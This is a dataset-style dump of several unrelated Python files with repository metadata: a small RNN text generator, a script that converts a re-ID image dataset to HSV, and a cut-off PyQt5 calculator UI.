d3635ad98eac34644d41591f180b459df7dae6ed | 27 | py | Python | week_0_to_2/inclass/test/sub2/cake_recipes.py | ScriptingBeyondCS/CS-35 | 1ee6135bbb2b8cfa5961007ccafbe77a2356020d | [
"MIT"
] | null | null | null | week_0_to_2/inclass/test/sub2/cake_recipes.py | ScriptingBeyondCS/CS-35 | 1ee6135bbb2b8cfa5961007ccafbe77a2356020d | [
"MIT"
] | null | null | null | week_0_to_2/inclass/test/sub2/cake_recipes.py | ScriptingBeyondCS/CS-35 | 1ee6135bbb2b8cfa5961007ccafbe77a2356020d | [
"MIT"
] | null | null | null | def getFive():
return 5 | 13.5 | 14 | 0.62963 | 4 | 27 | 4.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0.259259 | 27 | 2 | 15 | 13.5 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
d392cb95337f1359637a26c016fd8e9968c765a2 | 18,489 | py | Python | Lil JadenBot/word-rnn.py | oduwa/pyRNN | d6c60724da68b76e2e9cf941431e6aa67ee0f329 | [
"MIT"
] | null | null | null | Lil JadenBot/word-rnn.py | oduwa/pyRNN | d6c60724da68b76e2e9cf941431e6aa67ee0f329 | [
"MIT"
] | null | null | null | Lil JadenBot/word-rnn.py | oduwa/pyRNN | d6c60724da68b76e2e9cf941431e6aa67ee0f329 | [
"MIT"
] | null | null | null | import numpy as np
import nltk
import pickle
import random
import argparse
# parse cli arguments
ap = argparse.ArgumentParser(description="Minimal RNN for text generation")
ap.add_argument('-t', '--train', help = 'Set this flag to train the RNN', action='store_true', default=False)
ap.add_argument('-t2', '--train2', help = 'Set this flag to train the RNN from the last point', action='store_true', default=False)
ap.add_argument('-f', '--file', help = 'The seed file for training or text generation', required=False)
args = vars(ap.parse_args())
filename = args['file']
isTrainingPhase = args['train']
isContinuingTraining = args['train2']
if(args['file']):
filename = args['file']
else:
filename = 'fanfic2.txt'
if(isTrainingPhase):
print("-------- TRAINING --------")
# data I/O
data_file = filename
data = open(data_file, 'r').read()
#print data
data_words = nltk.word_tokenize(data.decode('utf8'))
# Make input into a set to remove duplicates and then make it into a list
words = list(set(data_words))
data_size, vocab_size = len(data_words), len(words)
print 'Data has %d words, %d unique.' % (data_size, vocab_size)
# Create dictionaries mapping a word to an index and vice versa
word_to_ix = { ch:i for i,ch in enumerate(words) }
ix_to_word = { i:ch for i,ch in enumerate(words) }
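# For example, if words were ['the', 'ice', 'cream'] (ordering depends on the
# set), word_to_ix could be {'the': 0, 'ice': 1, 'cream': 2} and ix_to_word its
# inverse, so each word maps to the index used for its one-hot vector below.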
# hyperparameters
hidden_size = 100 # size of hidden layer of neurons
seq_length = 25 # number of steps to unroll the RNN for
learning_rate = 1e-1
# initialise model parameters
Wxh = np.random.randn(hidden_size, vocab_size)*0.01 # input to hidden
Whh = np.random.randn(hidden_size, hidden_size)*0.01 # hidden to hidden
Why = np.random.randn(vocab_size, hidden_size)*0.01 # hidden to output
bh = np.zeros((hidden_size, 1)) # hidden bias
by = np.zeros((vocab_size, 1)) # output bias
# Initialise rnn for serialization
rnn = {}
rnn["hidden_size"] = hidden_size
rnn["seq_length"] = seq_length
rnn["learning_rate"] = learning_rate
def lossFun(inputs, targets, hprev):
"""
inputs,targets are both list of integers.
hprev is Hx1 array of initial hidden state
returns the loss, gradients on model parameters, and last hidden state
"""
# dictionaries for values at each timestep indexed by timestep
# xs[t]-> input_t, hs[t]->hiddenState_t, ys[t]->output_t, ps[t]->probabilities_t,
xs, hs, ys, ps = {}, {}, {}, {}
hs[-1] = np.copy(hprev)
loss = 0
# FORWARD PASS
# Go through each timestep t
for t in xrange(len(inputs)):
# encode input in one-hot encoding (aka 1-of-k encoding)
xs[t] = np.zeros((vocab_size,1))
xs[t][inputs[t]] = 1
# Update our hidden state according to the recurrent function f_W(x_t, h_t-1)
# given as h_t = tanh(W_xh.x_t + W_hh.h_t-1 + bias)
hs[t] = np.tanh(np.dot(Wxh, xs[t]) + np.dot(Whh, hs[t-1]) + bh) # hidden state
# Compute our output
ys[t] = np.dot(Why, hs[t]) + by # unnormalized log probabilities for the next word
ps[t] = np.exp(ys[t]) / np.sum(np.exp(ys[t])) # probabilities for the next word
# Accumulate the loss for this time step as the negative log of the predicted probability.
# Ideally, we would have a probability of 1 for the actual next word. If it is 1, the loss is 0, since log(1) = 0.
loss += -np.log(ps[t][targets[t],0]) # softmax (cross-entropy loss)
# BACKWARD PASS: compute gradients going backwards
dWxh, dWhh, dWhy = np.zeros_like(Wxh), np.zeros_like(Whh), np.zeros_like(Why) # Initialise gradients of weight matrices
dbh, dby = np.zeros_like(bh), np.zeros_like(by) # Initialise gradients of biases
dhnext = np.zeros_like(hs[0]) # Initialise gradient for next timestep
for t in reversed(xrange(len(inputs))):
dy = np.copy(ps[t])
dy[targets[t]] -= 1 # backprop into y. see http://cs231n.github.io/neural-networks-case-study/#grad if confused here
dWhy += np.dot(dy, hs[t].T)
dby += dy
dh = np.dot(Why.T, dy) + dhnext # backprop into h
dhraw = (1 - hs[t] * hs[t]) * dh # backprop through tanh nonlinearity
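# (Since d/dz tanh(z) = 1 - tanh(z)**2 and hs[t] = tanh(...), the factor
# (1 - hs[t] * hs[t]) is exactly the tanh derivative at this timestep.)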
dbh += dhraw
dWxh += np.dot(dhraw, xs[t].T)
dWhh += np.dot(dhraw, hs[t-1].T)
dhnext = np.dot(Whh.T, dhraw)
for dparam in [dWxh, dWhh, dWhy, dbh, dby]:
np.clip(dparam, -5, 5, out=dparam) # clip to mitigate exploding gradients
rnn["loss"] = loss
rnn["dWxh"] = dWxh
rnn["dWhh"] = dWhh
rnn["dWhy"] = dWhy
rnn["dbh"] = dbh
rnn["dby"] = dby
rnn["Wxh"] = Wxh
rnn["Whh"] = Whh
rnn["Why"] = Why
rnn["bh"] = bh
rnn["by"] = by
return loss, dWxh, dWhh, dWhy, dbh, dby, hs[len(inputs)-1]
def sample(h, seed_ix, n):
"""
sample a sequence of integers from the model
h is memory state, seed_ix is seed letter for first time step
"""
# Set up our one-hot encoded input vector based on the seed character.
x = np.zeros((vocab_size, 1))
x[seed_ix] = 1
# Set up an array to keep track of our sequence.
ixes = []
# For each timestep
for t in xrange(n):
# Update hidden state and generate output and apply softmax to get probabilities
h = np.tanh(np.dot(Wxh, x) + np.dot(Whh, h) + bh)
y = np.dot(Why, h) + by
p = np.exp(y) / np.sum(np.exp(y))
# Sample the index of the next word from the probability distribution p
ix = np.random.choice(range(vocab_size), p=p.ravel())
# Create new one-hot encoding input for selected character
x = np.zeros((vocab_size, 1))
x[ix] = 1
ixes.append(ix)
return ixes
# TRAINING
# n is the number of training iterations we've done. p is the index into our training data for where we are now.
n, p = 0, 0
# Set up memory variables for the Adagrad algorithm
mWxh, mWhh, mWhy = np.zeros_like(Wxh), np.zeros_like(Whh), np.zeros_like(Why)
mbh, mby = np.zeros_like(bh), np.zeros_like(by) # memory variables for Adagrad
smooth_loss = -np.log(1.0/vocab_size)*seq_length # loss at iteration 0
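# Explanatory note: with uniform predictions each step contributes
# -log(1/vocab_size) to the loss, so a window of seq_length steps starts at
# roughly -np.log(1.0/vocab_size)*seq_length, which is what smooth_loss is set to above.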
# Training loop
try:
while True:
# prepare inputs (we're sweeping from left to right in steps seq_length long)
if p+seq_length+1 >= len(data_words) or n == 0:
hprev = np.zeros((hidden_size,1)) # reset RNN memory
p = 0 # go from start of data
# Fetch inputs and targets of length seq_length at a time
inputs = [word_to_ix[w] for w in data_words[p:p+seq_length]]
# we're predicting the next character so the target for data[i] is data[i+1]
targets = [word_to_ix[w] for w in data_words[p+1:p+seq_length+1]]
# print a sample to the terminal every 100 training steps so we can see how it's doing
if n % 100 == 0:
sample_ix = sample(hprev, inputs[0], 200)
txt = ' '.join(ix_to_word[ix] for ix in sample_ix)
print '----\n %s \n----' % (txt, )
# forward seq_length characters through the net and fetch gradient
loss, dWxh, dWhh, dWhy, dbh, dby, hprev = lossFun(inputs, targets, hprev)
smooth_loss = smooth_loss * 0.999 + loss * 0.001 # exponential moving average of the loss for smoother reporting
if n % 100 == 0: print 'iter %d, loss: %f' % (n, smooth_loss) # print progress
# perform parameter update with Adagrad
for param, dparam, mem in zip([Wxh, Whh, Why, bh, by],
[dWxh, dWhh, dWhy, dbh, dby],
[mWxh, mWhh, mWhy, mbh, mby]):
mem += dparam * dparam
param += -learning_rate * dparam / np.sqrt(mem + 1e-8) # adagrad update
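# Worked sketch (assumed numbers, for illustration only): for one weight with
# gradient dparam = 0.5 on its first update, mem becomes 0.25 and the step is
# -0.1 * 0.5 / sqrt(0.25 + 1e-8) ~= -0.1; as mem accumulates, that weight's
# effective step size shrinks.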
p += seq_length # move data pointer to next chunk of size seq_length
n += 1 # iteration counter
rnn["h"] = hprev
rnn["nuber_of_iterations"] = n
rnn["position_in_data"] = p
except KeyboardInterrupt:
# Serialize the model (weights, biases, hidden state and training position) to use later
f = open('rnn.ser', 'wb')
pickle.dump(rnn, f)
f.close()
exit()
elif(isContinuingTraining):
print("-------- RESUMING TRAINING FROM SERIALIZED POINT --------")
# Load serialized rnn parameters
f = open("rnn.ser", 'rb')
rnn = pickle.load(f)
f.close()
# data I/O
data_file = filename
data = open(data_file, 'r').read()
#print data
data_words = nltk.word_tokenize(data.decode('utf8'))
# Make input into a set to remove duplicates and then make it into a list
words = list(set(data_words))
data_size, vocab_size = len(data_words), len(words)
print 'Data has %d words, %d unique.' % (data_size,vocab_size)
# Create dictionaries mapping a word to an index and vice versa
word_to_ix = { ch:i for i,ch in enumerate(words) }
ix_to_word = { i:ch for i,ch in enumerate(words) }
# hyperparameters
hidden_size = 100 # size of hidden layer of neurons
seq_length = 25 # number of steps to unroll the RNN for
learning_rate = 1e-1
# Model weights and biases
Wxh = rnn["Wxh"]
Whh = rnn["Whh"]
Why = rnn["Why"]
bh = rnn["bh"]
by = rnn["by"]
hprev = rnn["h"]
# Load rnn parameters
hidden_size = rnn["hidden_size"]
seq_length = rnn["seq_length"]
learning_rate = rnn["learning_rate"]
def lossFun(inputs, targets, hprev):
"""
inputs,targets are both list of integers.
hprev is Hx1 array of initial hidden state
returns the loss, gradients on model parameters, and last hidden state
"""
# dictionaries for values at each timestep indexed by timestep
# xs[t]-> input_t, hs[t]->hiddenState_t, ys[t]->output_t, ps[t]->probabilities_t,
xs, hs, ys, ps = {}, {}, {}, {}
hs[-1] = np.copy(hprev)
loss = 0
# FORWARD PASS
# Go through each timestep t
for t in xrange(len(inputs)):
# encode input in one-hot encoding (aka 1-of-k encoding)
xs[t] = np.zeros((vocab_size,1))
xs[t][inputs[t]] = 1
# Update our hidden state according to the recurrent function f_W(x_t, h_t-1)
# given as h_t = tanh(W_xh.x_t + W_hh.h_t-1 + bias)
hs[t] = np.tanh(np.dot(Wxh, xs[t]) + np.dot(Whh, hs[t-1]) + bh) # hidden state
# Compute our output
ys[t] = np.dot(Why, hs[t]) + by # unnormalized log probabilities for next chars
ps[t] = np.exp(ys[t]) / np.sum(np.exp(ys[t])) # probabilities for next chars
# Accumulate the loss for this time step as the negative log of the predicted probability.
# Ideally, we would have a probability of 1 for the actual next character. If it is 1, the loss is 0, log(1) = 0.
loss += -np.log(ps[t][targets[t],0]) # softmax (cross-entropy loss)
# BACKWARD PASS: compute gradients going backwards
dWxh, dWhh, dWhy = np.zeros_like(Wxh), np.zeros_like(Whh), np.zeros_like(Why) # Initialise gradients of weight matrices
dbh, dby = np.zeros_like(bh), np.zeros_like(by) # Initialise gradients of biases
dhnext = np.zeros_like(hs[0]) # Initialise gradient for next timestep
for t in reversed(xrange(len(inputs))):
dy = np.copy(ps[t])
dy[targets[t]] -= 1 # backprop into y. see http://cs231n.github.io/neural-networks-case-study/#grad if confused here
dWhy += np.dot(dy, hs[t].T)
dby += dy
dh = np.dot(Why.T, dy) + dhnext # backprop into h
dhraw = (1 - hs[t] * hs[t]) * dh # backprop through tanh nonlinearity
dbh += dhraw
dWxh += np.dot(dhraw, xs[t].T)
dWhh += np.dot(dhraw, hs[t-1].T)
dhnext = np.dot(Whh.T, dhraw)
for dparam in [dWxh, dWhh, dWhy, dbh, dby]:
np.clip(dparam, -5, 5, out=dparam) # clip to mitigate exploding gradients
rnn["loss"] = loss
rnn["dWxh"] = dWxh
rnn["dWhh"] = dWhh
rnn["dWhy"] = dWhy
rnn["dbh"] = dbh
rnn["dby"] = dby
rnn["Wxh"] = Wxh
rnn["Whh"] = Whh
rnn["Why"] = Why
rnn["bh"] = bh
rnn["by"] = by
return loss, dWxh, dWhh, dWhy, dbh, dby, hs[len(inputs)-1]
def sample(h, seed_ix, n):
"""
sample a sequence of integers from the model
h is memory state, seed_ix is seed letter for first time step
"""
# Set up our one-hot encoded input vector based on the seed character.
x = np.zeros((vocab_size, 1))
x[seed_ix] = 1
# Set up an array to keep track of our sequence.
ixes = []
# For each timestep
for t in xrange(n):
# Update hidden state and generate output and apply softmax to get probabilities
h = np.tanh(np.dot(Wxh, x) + np.dot(Whh, h) + bh)
y = np.dot(Why, h) + by
p = np.exp(y) / np.sum(np.exp(y))
# Sample the index of the next word from the probability distribution p
ix = np.random.choice(range(vocab_size), p=p.ravel())
# Create new one-hot encoding input for selected character
x = np.zeros((vocab_size, 1))
x[ix] = 1
ixes.append(ix)
return ixes
# TRAINING
# n is the number of training iterations we've done. p is the index into our training data for where we are now.
n = rnn["nuber_of_iterations"]
p = rnn["position_in_data"]
# Set up memory variables for the Adagrad algorithm
mWxh, mWhh, mWhy = np.zeros_like(Wxh), np.zeros_like(Whh), np.zeros_like(Why)
mbh, mby = np.zeros_like(bh), np.zeros_like(by) # memory variables for Adagrad
smooth_loss = -np.log(1.0/vocab_size)*seq_length # loss at iteration 0
# Training loop
print "ITERTIONS: %d , DATA POS: %d" % (n,p)
try:
while True:
# prepare inputs (we're sweeping from left to right in steps seq_length long)
if p+seq_length+1 >= len(data_words) or n == 0:
hprev = np.zeros((hidden_size,1)) # reset RNN memory
p = 0 # go from start of data
# Fetch inputs and targets of length seq_length at a time
inputs = [word_to_ix[w] for w in data_words[p:p+seq_length]]
# we're predicting the next character so the target for data[i] is data[i+1]
targets = [word_to_ix[w] for w in data_words[p+1:p+seq_length+1]]
# print a sample to the terminal every 100 training steps so we can see how it's doing
if n % 100 == 0:
sample_ix = sample(hprev, inputs[0], 200)
txt = ' '.join(ix_to_word[ix] for ix in sample_ix)
print '----\n %s \n----' % (txt, )
# forward seq_length characters through the net and fetch gradient
loss, dWxh, dWhh, dWhy, dbh, dby, hprev = lossFun(inputs, targets, hprev)
smooth_loss = smooth_loss * 0.999 + loss * 0.001 # exponential moving average of the loss for smoother reporting
if n % 100 == 0: print 'iter %d, loss: %f' % (n, smooth_loss) # print progress
# perform parameter update with Adagrad
for param, dparam, mem in zip([Wxh, Whh, Why, bh, by],
[dWxh, dWhh, dWhy, dbh, dby],
[mWxh, mWhh, mWhy, mbh, mby]):
mem += dparam * dparam
param += -learning_rate * dparam / np.sqrt(mem + 1e-8) # adagrad update
p += seq_length # move data pointer to next chunk of size seq_length
n += 1 # iteration counter
rnn["h"] = hprev
rnn["nuber_of_iterations"] = n
rnn["position_in_data"] = p
except KeyboardInterrupt:
# Serialize the model (weights, biases, hidden state and training position) to use later
f = open('rnn.ser', 'wb')
pickle.dump(rnn, f)
f.close()
exit()
else:
# data I/O
data_file = filename
data = open(data_file, 'r').read()
#print data
data_words = nltk.word_tokenize(data.decode('utf8'))
# Make input into a set to remove duplicates and then make it into a list
words = list(set(data_words))
data_size, vocab_size = len(data_words), len(words)
print 'Data has %d words, %d unique.' % (data_size,vocab_size)
# Load serialized rnn parameters
f = open("rnn_jaden.ser", 'rb')
rnn = pickle.load(f)
f.close()
# model hyperparameters
hidden_size = rnn["hidden_size"]
seq_length = rnn["seq_length"]
seq_length = rnn["learning_rate"]
# Create dictionaries mapping a word to an index and vice versa
word_to_ix = { ch:i for i,ch in enumerate(words) }
ix_to_word = { i:ch for i,ch in enumerate(words) }
# Model weights and biases
Wxh = rnn["Wxh"]
Whh = rnn["Whh"]
Why = rnn["Why"]
bh = rnn["bh"]
by = rnn["by"]
h = rnn["h"]
def sample(h, seed_ix, n):
"""
sample a sequence of integers from the model
h is memory state, seed_ix is seed letter for first time step
"""
# Set up our one-hot encoded input vector based on the seed character.
x = np.zeros((vocab_size, 1))
x[seed_ix] = 1
# Set up an array to keep track of our sequence.
ixes = []
# For each timestep
for t in xrange(n):
# Update hidden state and generate output and apply softmax to get probabilities
h = np.tanh(np.dot(Wxh, x) + np.dot(Whh, h) + bh)
y = np.dot(Why, h) + by
p = np.exp(y) / np.sum(np.exp(y))
# Sample the index of the next word from the probability distribution p
ix = np.random.choice(range(vocab_size), p=p.ravel())
# Create new one-hot encoding input for selected character
x = np.zeros((vocab_size, 1))
x[ix] = 1
ixes.append(ix)
return ixes
# Sample and generate words
sample_ix = sample(h, word_to_ix[random.choice(data_words)], 200)
txt = ' '.join(ix_to_word[ix] for ix in sample_ix)
print '----\n %s \n----' % (txt, )
| 41.362416 | 131 | 0.584456 | 2,737 | 18,489 | 3.867738 | 0.126416 | 0.022483 | 0.02286 | 0.013603 | 0.917249 | 0.909975 | 0.909975 | 0.89864 | 0.875401 | 0.875401 | 0 | 0.013204 | 0.299529 | 18,489 | 446 | 132 | 41.455157 | 0.804185 | 0.308237 | 0 | 0.860806 | 0 | 0 | 0.075962 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.018315 | null | null | 0.040293 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d395e1bc5e809649e705f3337f40fd55712924b5 | 8,433 | py | Python | prepare.py | Prettyfinger/Twostream_reID | 8e340e0c03bd248b04ff1b48398ca99b6aeaa508 | [
"MIT"
] | 6 | 2019-05-17T03:40:59.000Z | 2021-04-09T11:01:54.000Z | prepare.py | Prettyfinger/Twostream_reID | 8e340e0c03bd248b04ff1b48398ca99b6aeaa508 | [
"MIT"
] | null | null | null | prepare.py | Prettyfinger/Twostream_reID | 8e340e0c03bd248b04ff1b48398ca99b6aeaa508 | [
"MIT"
] | 2 | 2019-09-12T06:19:05.000Z | 2020-06-12T11:34:12.000Z | #*************RGB***********************
# import os
# from shutil import copyfile
#
# # You only need to change this line to your dataset download path
# download_path = '../Market'
#
# if not os.path.isdir(download_path):
# print('please change the download_path')
#
# save_path = download_path + '/pytorch'
# if not os.path.isdir(save_path):
# os.mkdir(save_path)
# #-----------------------------------------
# #query
# query_path = download_path + '/query'
# query_save_path = download_path + '/pytorch/query'
# if not os.path.isdir(query_save_path):
# os.mkdir(query_save_path)
#
# for root, dirs, files in os.walk(query_path, topdown=True):
# for name in files:
# if not name[-3:]=='jpg':
# continue
# ID = name.split('_')
# src_path = query_path + '/' + name
# dst_path = query_save_path + '/' + ID[0]
# if not os.path.isdir(dst_path):
# os.mkdir(dst_path)
# copyfile(src_path, dst_path + '/' + name)
#
# #-----------------------------------------
# #multi-query
# query_path = download_path + '/gt_bbox'
# # for dukemtmc-reid, we do not need multi-query
# if os.path.isdir(query_path):
# query_save_path = download_path + '/pytorch/multi-query'
# if not os.path.isdir(query_save_path):
# os.mkdir(query_save_path)
#
# for root, dirs, files in os.walk(query_path, topdown=True):
# for name in files:
# if not name[-3:]=='jpg':
# continue
# ID = name.split('_')
# src_path = query_path + '/' + name
# dst_path = query_save_path + '/' + ID[0]
# if not os.path.isdir(dst_path):
# os.mkdir(dst_path)
# copyfile(src_path, dst_path + '/' + name)
#
# #-----------------------------------------
# #gallery
# gallery_path = download_path + '/bounding_box_test'
# gallery_save_path = download_path + '/pytorch/gallery'
# if not os.path.isdir(gallery_save_path):
# os.mkdir(gallery_save_path)
#
# for root, dirs, files in os.walk(gallery_path, topdown=True):
# for name in files:
# if not name[-3:]=='jpg':
# continue
# ID = name.split('_')
# src_path = gallery_path + '/' + name
# dst_path = gallery_save_path + '/' + ID[0]
# if not os.path.isdir(dst_path):
# os.mkdir(dst_path)
# copyfile(src_path, dst_path + '/' + name)
#
# #---------------------------------------
# #train_all
# train_path = download_path + '/bounding_box_train'
# train_save_path = download_path + '/pytorch/train_all'
# if not os.path.isdir(train_save_path):
# os.mkdir(train_save_path)
#
# for root, dirs, files in os.walk(train_path, topdown=True):
# for name in files:
# if not name[-3:]=='jpg':
# continue
# ID = name.split('_')
# src_path = train_path + '/' + name
# dst_path = train_save_path + '/' + ID[0]
# if not os.path.isdir(dst_path):
# os.mkdir(dst_path)
# copyfile(src_path, dst_path + '/' + name)
#
#
# #---------------------------------------
# #train_val
# train_path = download_path + '/bounding_box_train'
# train_save_path = download_path + '/pytorch/train'
# val_save_path = download_path + '/pytorch/val'
# if not os.path.isdir(train_save_path):
# os.mkdir(train_save_path)
# os.mkdir(val_save_path)
#
# for root, dirs, files in os.walk(train_path, topdown=True):
# for name in files:
# if not name[-3:]=='jpg':
# continue
# ID = name.split('_')
# src_path = train_path + '/' + name
# dst_path = train_save_path + '/' + ID[0]
# if not os.path.isdir(dst_path):
# os.mkdir(dst_path)
# dst_path = val_save_path + '/' + ID[0] #first image is used as val image
# os.mkdir(dst_path)
# copyfile(src_path, dst_path + '/' + name)
#****************RGB TO HSV****************************
import os
from shutil import copyfile
import cv2
# You only need to change this line to your dataset download path
download_path = '/home/mcii216/fmx/dataset_ReID/Market-1501'
if not os.path.isdir(download_path):
print('please change the download_path')
save_path = download_path + '/pytorchsv'
if not os.path.isdir(save_path):
os.mkdir(save_path)
#-----------------------------------------
# query
query_path = download_path + '/query'
query_save_path = download_path + '/pytorchsv/query'
if not os.path.isdir(query_save_path):
os.mkdir(query_save_path)
for root, dirs, files in os.walk(query_path, topdown=True):
for name in files:
if not name[-3:]=='jpg':
continue
ID = name.split('_')
src_path = query_path + '/' + name
img = cv2.imread(src_path)
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
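# Note: cv2.imread returns images in BGR channel order, and for 8-bit images
# cv2.COLOR_BGR2HSV maps hue to [0, 179] and saturation/value to [0, 255];
# the converted array is what gets written to disk below.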
sv_path = query_save_path + '/' + ID[0] + '/' + name
dst_path = query_save_path + '/' + ID[0]
if not os.path.isdir(dst_path):
os.mkdir(dst_path)
cv2.imwrite(sv_path, img_hsv)
#-----------------------------------------
#multi-query
query_path = download_path + '/gt_bbox'
# for dukemtmc-reid, we do not need multi-query
if os.path.isdir(query_path):
query_save_path = download_path + '/pytorchsv/multi-query'
if not os.path.isdir(query_save_path):
os.mkdir(query_save_path)
for root, dirs, files in os.walk(query_path, topdown=True):
for name in files:
if not name[-3:]=='jpg':
continue
ID = name.split('_')
src_path = query_path + '/' + name
img = cv2.imread(src_path)
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
sv_path = query_save_path + '/' + ID[0] + '/' + name
dst_path = query_save_path + '/' + ID[0]
if not os.path.isdir(dst_path):
os.mkdir(dst_path)
cv2.imwrite(sv_path, img_hsv)
#-----------------------------------------
#gallery
gallery_path = download_path + '/bounding_box_test'
gallery_save_path = download_path + '/pytorchsv/gallery'
if not os.path.isdir(gallery_save_path):
os.mkdir(gallery_save_path)
for root, dirs, files in os.walk(gallery_path, topdown=True):
for name in files:
if not name[-3:]=='jpg':
continue
ID = name.split('_')
src_path = gallery_path + '/' + name
img = cv2.imread(src_path)
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
sv_path = gallery_save_path + '/' + ID[0] + '/' + name
dst_path = gallery_save_path + '/' + ID[0]
if not os.path.isdir(dst_path):
os.mkdir(dst_path)
cv2.imwrite(sv_path, img_hsv)
#---------------------------------------
#train_all
train_path = download_path + '/bounding_box_train'
train_save_path = download_path + '/pytorchsv/train_all'
if not os.path.isdir(train_save_path):
os.mkdir(train_save_path)
for root, dirs, files in os.walk(train_path, topdown=True):
for name in files:
if not name[-3:]=='jpg':
continue
ID = name.split('_')
src_path = train_path + '/' + name
img = cv2.imread(src_path)
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
sv_path = train_save_path + '/' + ID[0] + '/' + name
dst_path = train_save_path + '/' + ID[0]
if not os.path.isdir(dst_path):
os.mkdir(dst_path)
cv2.imwrite(sv_path, img_hsv)
#---------------------------------------
#train_val
train_path = download_path + '/bounding_box_train'
train_save_path = download_path + '/pytorchsv/train'
val_save_path = download_path + '/pytorchsv/val'
if not os.path.isdir(train_save_path):
os.mkdir(train_save_path)
os.mkdir(val_save_path)
for root, dirs, files in os.walk(train_path, topdown=True):
for name in files:
if not name[-3:]=='jpg':
continue
ID = name.split('_')
src_path = train_path + '/' + name
img = cv2.imread(src_path)
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
# sv_path = train_save_path + '/' + ID[0] + '/' + name
dst_path = train_save_path + '/' + ID[0]
if not os.path.isdir(dst_path):
os.mkdir(dst_path)
dst_path = val_save_path + '/' + ID[0]
os.mkdir(dst_path)
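# (As in the commented RGB version above, the first image of each identity is
# redirected to the val folder; subsequent images for that identity stay under train.)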
cv2.imwrite(dst_path + '/' + name, img_hsv)
| 34.847107 | 87 | 0.569667 | 1,122 | 8,433 | 4.025847 | 0.069519 | 0.100952 | 0.092097 | 0.058446 | 0.980739 | 0.970113 | 0.934027 | 0.919637 | 0.919637 | 0.919637 | 0 | 0.009561 | 0.243448 | 8,433 | 241 | 88 | 34.991701 | 0.698433 | 0.490454 | 0 | 0.717172 | 0 | 0 | 0.07215 | 0.015392 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.030303 | 0 | 0.030303 | 0.010101 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6cb995d209b91ed26bb29c4df78d7a3613962375 | 65,027 | py | Python | subPrograms/Hesap_Makinesi/Ui_calculator.py | birhann/Student-Tracking-System_Ogrenci-Takip-Sistemi | 0e01add14fa207861fbb573df6977c6701632cf5 | [
"Unlicense"
] | 2 | 2021-01-09T12:53:54.000Z | 2021-08-12T18:37:17.000Z | subPrograms/Hesap_Makinesi/Ui_calculator.py | birhann/Student-Tracking-System_Ogrenci-Takip-Sistemi | 0e01add14fa207861fbb573df6977c6701632cf5 | [
"Unlicense"
] | null | null | null | subPrograms/Hesap_Makinesi/Ui_calculator.py | birhann/Student-Tracking-System_Ogrenci-Takip-Sistemi | 0e01add14fa207861fbb573df6977c6701632cf5 | [
"Unlicense"
] | 3 | 2021-01-26T06:02:02.000Z | 2021-06-20T15:52:05.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'c:\Users\Lenovo\Desktop\Python\Programlar\Hesap_Makinesi\calculator.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(429, 362)
Form.setMinimumSize(QtCore.QSize(429, 362))
Form.setMaximumSize(QtCore.QSize(429, 500))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 62, 211))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 255, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(189, 247, 244))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(88, 160, 155))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(121, 128, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 244, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
